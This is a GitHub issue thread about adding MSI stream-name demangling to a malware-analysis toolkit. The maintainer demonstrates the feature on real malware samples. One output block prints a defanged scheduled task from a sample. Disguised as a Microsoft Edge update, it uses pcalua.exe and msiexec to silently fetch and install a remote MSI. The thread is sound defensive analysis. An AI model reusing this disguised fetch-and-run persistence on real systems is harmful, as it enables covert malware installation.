Closed glesnewichpfpt closed 1 year ago
jhhcs
commented
1 year ago Oh this has been bugging me for so long 😅! I didn't know the Master of Maldocs had a script for this, although that is obviously no surprise. Excellent suggestion, I'll get on it. My feeling is that you'd really just want xtdoc to automatically display the "correct" file names, I'll see if I can just make it work automatically, even without an additional flag.
jhhcs
commented
1 year ago This has been added and will be in the next release. The unit xtdoc will now demangle MSI names, but it will still extract all the streams raw. I added a separate unit called xtmsi which combines all the stream information in a single, synthesized JSON document that is available as one of the extracted items. For your second example, this looks as follows.
Here is the directory listing:
[19:01] emit f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb | xt -l
Action/AI_DATA_SETTER
Binary/New
Binary/PowerShellScriptLauncher.dll
Binary/Up
Binary/aicustact.dll
Binary/aischeduler.dll
Binary/aischeduler2.dll
Binary/banner
Binary/cmdlinkarrow
Binary/completi
Binary/custicon
Binary/dialog
Binary/exclamic
Binary/info
Binary/insticon
Binary/removico
Binary/repairic
Binary/tabback
MsiTables.jsonAnd here is an example of isolating the (likely?) malicious logic in the AI_ScheduledTasks table:
[19:01] emit f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb | xt MsiTables.json | xtjson AI_ScheduledTasks.#0 | defang
{
"TaskId": "MicrosoftEdgeUpdateTaskMachine",
"TaskName": "Microsoft Edge Update Task Machine",
"Run": "c:\\windows\\system32\\pcalua.exe",
"CmdLine": "-a msiexec -c /Q /i https[:]//www.thecloudnet[.]org/%username%.msi",
"WorkDir": "c:\\windows\\system32",
"User": "",
"Pass": "",
"UserProp": "[%UserDomain]\\[LogonUser]",
"PassProp": "",
"StartTime": "0",
"Comments": "",
"Flags": 8192,
"Trigger": "1|300|1|1|0|1|0|",
"Condition": "1",
"TaskVersion": "2.0"
}For your first example, I get a slightly different listing than the one you posted:
[19:07] emit a00ae529a1ce4e2eb7f988ed5adaa07e653de3fe0c01bec9452aae71b935f63c | xt -l
MsiTables.json
_16AD64AAB5E18007C4B59CED3D01567B
[19:07] emit a00ae529a1ce4e2eb7f988ed5adaa07e653de3fe0c01bec9452aae71b935f63c | xtdoc -l
[5]SummaryInformation
_16AD64AAB5E18007C4B59CED3D01567B
!_Columns
!_StringData
!_StringPool
!_Tables
!_Validation
!AdminExecuteSequence
!AdvtExecuteSequence
!FeatureComponents
!Feature
!Media
!Directory
!File
!InstallExecuteSequence
!Component
!ModuleSignature
!Property
!CustomActionHowever, I get the same listing from 7zip, so I am thinking it's probably correct.
jhhcs
commented
1 year ago Ah, right, I was using xt in the examples above: xt will default to xtmsi when executed on MSIs.
jhhcs
commented
1 year ago Alright, 0.6.4. is deploying, I am closing this out as completed. I added a test and I think all is well, but let me know if it is giving you any trouble.
Specification
MSI files are already parsed well using the xtdoc unit. However, the embedded streams are often incorrectly labeled with nonsensical Chinese characters
Example (from https://bazaar.abuse.ch/sample/a00ae529a1ce4e2eb7f988ed5adaa07e653de3fe0c01bec9452aae71b935f63c/)
Didier Stevens wrote plugin for oledump (https://github.com/DidierStevens/DidierStevensSuite/blob/master/plugin_msi_info.py ) that handles this issue & properly displays the correct embedded names. The cleaned up stream names make it much easier to discern what the MSI will drop and easier to select what stream to examine next or dump out
I don't know if its worth introducing a new unit (like xtmsi) or to just build that encoding fix into xtdoc and use it as a flag inside of the unit :)
Test Cases
Second comparison (truncated)